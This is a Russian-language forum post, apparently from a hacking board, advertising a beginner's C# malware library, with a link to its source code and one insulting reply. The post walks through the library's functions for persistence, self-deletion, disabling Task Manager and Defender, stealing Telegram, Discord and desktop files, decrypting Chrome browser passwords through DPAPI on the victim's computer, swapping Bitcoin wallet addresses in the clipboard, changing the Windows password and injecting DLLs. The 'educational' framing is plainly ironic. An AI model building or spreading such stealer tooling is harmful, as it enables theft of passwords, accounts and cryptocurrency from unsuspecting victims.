Всем доброго времени суток, ночью было делать нечего, решил что нибудь пописать и тут появилась эта идея. Вообщем, от скрипткидди, для скрипткидди. Видел очень много тем в интернете, где спрашивают, как сделать то или иное, поэтому решил сделать некий сборник, так сказать. Сразу скажу, что так как я только начал учить Шарп, на супер функции вы тут не наткнетесь, но что то полезное возможно возьмете. Практического толка от библиотеки я думаю нет, так как она будет детектиться, да и тащить ее за собой тоже особо удовольствия не доставит. Ближе к делу: Общий вид dll: Скрин Сразу уточним, что большинство функций тут требуют прав администратора. А так как создана она в обучающих целях, байпасить мы ничего не будем) Начну с ProccessProtect. Что бы особо не париться с перехватом ntqueryprocessinformation и прочими функциями, сделал прямо в лоб, а именно повысил привилегии нашего процесса так, что бы его нельзя было убить в Диспетчере задач. Естественно, в сторонних такс менеджерах это не сработает, так же как и от taskkill в процессе, но хоть что то. Вызвать в нашей программе : ProcessProtect.Protect(); Code ProcessProtect.Protect(); Для тех, кто хочет больше узнать про это тему, то Вам стоит копать в сторону перехвата функций, если же еще дальше пойти, то просто инжект в системный процесс, но это мое мнение, может в комментариях скажут способы по лучше, с радостью бы узнал. В HideModule добавлены методы мигрирования или же небольшого скрытия : HideModule.Suicide(pathToExe); Code HideModule.Suicide(pathToExe); - Так мы удалим наш экзешник, я сделал это через батник HideModule.EnableTaskManager(true/false); Code HideModule.EnableTaskManager(true/false); - Детская шалость, включаем,выключаем через реестр HideModule.SetAutorun(name,path) Code HideModule.SetAutorun(name,path) - Добавляем в авторан, где имя - имя которое будет отображаться в реестре, path - путь до экзешника DisableDefender я тестировал на компьютере друга, он там срабатывал через раз, возможно у кого 10, протестят. Теперь посмотрим на Steal: Общий вызов выглядит так : Apps.Desktop/Telegram/Discord.Steal(path,true/false) Code Apps.Desktop/Telegram/Discord.Steal(path,true/false) - Путь куда копируем и будем ли перезаписывать Теперь на счет паролей с браузеров. Насколько я знаю, то пароли с ХромБазед браузерах шифруются с помощью DPAPI - это Windows API для крипта. Ситуация такая, если Вы пишете свой детский *******, что бы кинуть другу(есесна с его разрешения Kappa), то Вы должны расшифровывать пароли только на компьютере жертвы. Базу необходимо сначала скопировать, а потом расшифровывать. В Шарпе есть уже встроенная функция: ProtectedData.Decrypt(); Code ProtectedData.Decrypt(); Но у меня она почему то отказывалась работать, поэтому реализовано было через WinAPI. Browsers.Decrypt(byte[] cipher, byte[] entropy); Code Browsers.Decrypt(byte[] cipher, byte[] entropy); И остался мини клипер, который будет подменять кошелек: Wallet.Clip(btcadr); Code Wallet.Clip(btcadr); SystemWork: Как сам считаю, добавил много бесполезных функций, аля IP и MAC адресов, ну раз уж добавил, пусть будут, описывать не буду, они простые. SystemWork.ChangeWinPass(pass); - меням пароль на Виндовс, тоже достаточно просто сделано В классе CheckWindow, реализован метод GetWindow, с помощью него можем получать активное окно пользователя, по заголовку есесна. Вызываем так - CheckWindow.GetWindow(name): Code CheckWindow.GetWindow(name): Добавил еще инжектор Сишных дллок. Вызываем так - Inject.Execute(pathDLL,process) Code Inject.Execute(pathDLL,process) Как мне кажется, в дллке мы можем написать проверку, запущен ли наш файл, удален ли и проверять, если тру, то запускаем заново. Но это чисто мое мнение, возможно я не прав Естественно, все это я расписывал не просто так. Я оставлю ссылку на исходники, если кому то будет интересно, оставлю и ссылку на гитхаб, скорее всего и дальше буду добавлять постепенно в нее разные методы, по мере обучения. Исходники старался оформить так, что бы даже недалекие люди поняли, что к чему, каждый метод был подписан, а так же к сложным моментам были добавлены комментарии : Я не говорю, что каждую строчка кода была написана мной, что то я брал с источников и оставлял ссылки на репозиторий/статью автора. Мной лишь редактировалось и добавлялись коменты для разъяснения. Сразу говорю, что код написан человеком, который только начал изучать язык, поэтому к критике готов. Если вдруг кому то что то будет не понятно, можете писать в лс или телегу, объясню) Тестировалось все на Win7 x64 В библиотеке еще достаточно много других методов, но все их описывать, уйдет очень много времени, все они не сложные Ссылка на сорцы : https://filecloud.me/oyoavgb8mfo0.html
Код говно ебаное,научись писать на шарпах,и составлять доку,а потом уже релизай свой бесполезные библиотеки